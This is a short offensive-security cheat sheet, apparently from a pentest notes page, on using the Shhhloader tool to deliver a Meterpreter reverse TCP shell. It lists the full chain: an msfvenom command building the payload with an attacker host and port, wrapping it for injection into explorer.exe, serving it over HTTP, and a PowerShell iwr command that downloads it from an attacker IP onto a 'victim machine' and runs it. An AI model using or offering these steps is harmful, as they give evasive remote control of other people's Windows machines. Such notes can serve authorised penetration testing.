SHHHHLOADER

https://github.com/icyguider/Shhhloader

  1. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.130 LPORT=8080 -f raw -o tcp.bin

  2. ./Shhhloader.py tcp.bin -p explorer.exe

  3. python3 -m http.server 80 #transfer the file on the victim machine

  4. open powershell on the victim machine:

  5. iwr http://<attacker_IP>/file.exe -Outfile .\file.exe

  6. run the file: .\file.exe

Last updated